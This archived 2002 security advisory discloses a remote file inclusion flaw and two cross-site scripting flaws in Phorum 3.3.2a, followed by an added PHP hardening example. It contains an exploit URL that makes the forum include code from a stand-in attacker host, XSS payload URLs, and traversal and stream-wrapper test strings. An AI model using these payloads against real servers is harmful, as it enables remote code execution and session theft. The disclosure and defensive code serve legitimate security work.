From: Markus Arndt (markus-arndtweb.de)
Date: Sat May 18 2002 - 05:32:56 CDT


    Target:
    Phorum 3.3.2a (maybe older versions too)

    Description:
    Phorum 3.3.2a lets remote users execute arbitrary code

    Found by:
    Markus Arndt<markus-arndtweb.de>

    Vendor:
    http://www.phorum.org

    Notified Vendor:
    Yes, already fixed in 3.3.2b

    Details:

    Another bug for remote command execution.
    This time it's admin/actions/del.php
    :)

    Some code (from admin/actions/del.php):
    <?php
        // $include_path is never set in this script; with register_globals on
        // it is taken straight from the request, so the require below can be
        // pointed at any local or remote file.
        require "$include_path/delete_message.php";
        delete_messages($id);
        QueMessage("Message(s) $id and all children were deleted!<br>");
    ?>

    The URL to exploit the script would be:
    http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

    That URL makes the script include http://[evilhost]/delete_message.php, so whatever PHP that remote file contains is executed on the vulnerable host.

    GoGoGo and secure your boxes. :)

    One other thing before I forget:
    cross-site scripting (CSS) attacks are possible in 2 files:

    http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
    http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>
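    Both issues above are the same mistake from the defender's side: request data
    flowing unchecked into a require path and into HTML output. The code below is
    an added example written for this archive, not Phorum's code and not part of
    the original post. It assumes the original del.php received $include_path and
    $id through register_globals, and it replaces the request-controlled include
    prefix with a server-side base directory plus a guard that rejects URLs and
    ".." escapes, validates the message id as a plain integer, and escapes the
    reflected message the way header.php/footer.php should. Function names,
    the temporary include directory and the sample inputs are all constructed
    for the demonstration.

```php
<?php
declare(strict_types=1);

// Return the real path of $file inside $base, or null when $file is a
// URL/stream wrapper (http://, ftp://, php://, data: ...), escapes $base
// via "..", or does not exist. $base is chosen by the server, never the request.
function safe_include_path(string $base, string $file): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $file)) {   // scheme prefix => reject
        return null;
    }
    $realBase = realpath($base);
    $realFile = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($realBase === false || $realFile === false) {     // missing file or dir
        return null;
    }
    // realpath() has resolved any "..": the result must still sit under the base.
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($realFile, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $realFile;
}

// Accept the message id only as a positive decimal integer; anything else
// (shell text, SQL, paths) is refused rather than interpolated.
function read_message_id(array $params): ?int
{
    $raw = $params['id'] ?? null;
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Escape before reflecting anything into the admin page (fixes the
// GLOBALS[message] class of bug in header.php/footer.php).
function safe_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- Demonstration on constructed inputs (no real request, no real Phorum) ---
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phorum_include_demo';
@mkdir($base, 0700);
file_put_contents($base . DIRECTORY_SEPARATOR . 'delete_message.php', "<?php\n");

$candidates = [
    'delete_message.php',                        // the legitimate library file
    'http://[evilhost]/delete_message.php',      // the advisory's remote include
    '../../../../etc/passwd',                    // directory traversal attempt
    'php://input',                               // stream wrapper
];
foreach ($candidates as $candidate) {
    $resolved = safe_include_path($base, $candidate);
    printf("%-40s => %s\n", $candidate, $resolved === null ? 'REJECTED' : 'ok: ' . $resolved);
}

var_dump(read_message_id(['id' => '42']));       // int(42)
var_dump(read_message_id(['id' => '42; ls']));   // NULL

echo safe_html('<script>alert("css strikes!");</script>'), "\n";
// Output is inert text: &lt;script&gt;alert(&quot;css strikes!&quot;);&lt;/script&gt;

// The hardened del.php body would then read:
//   $file = safe_include_path(PHORUM_INCLUDE_DIR, 'delete_message.php');
//   $id   = read_message_id($_GET);
//   if ($file === null || $id === null) { http_response_code(400); exit; }
//   require $file;
//   delete_messages($id);
//   QueMessage('Message(s) ' . safe_html((string) $id) . ' and all children were deleted!<br>');
```

    Pinning the base directory in code is what removes the bug; turning off
    register_globals and allow_url_fopen/allow_url_include in php.ini is
    defence in depth that stops the same pattern elsewhere in a codebase, but it
    does not make a script that still trusts $include_path correct.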

    Markus Arndt<markus-arndtweb.de>
    http://skka.de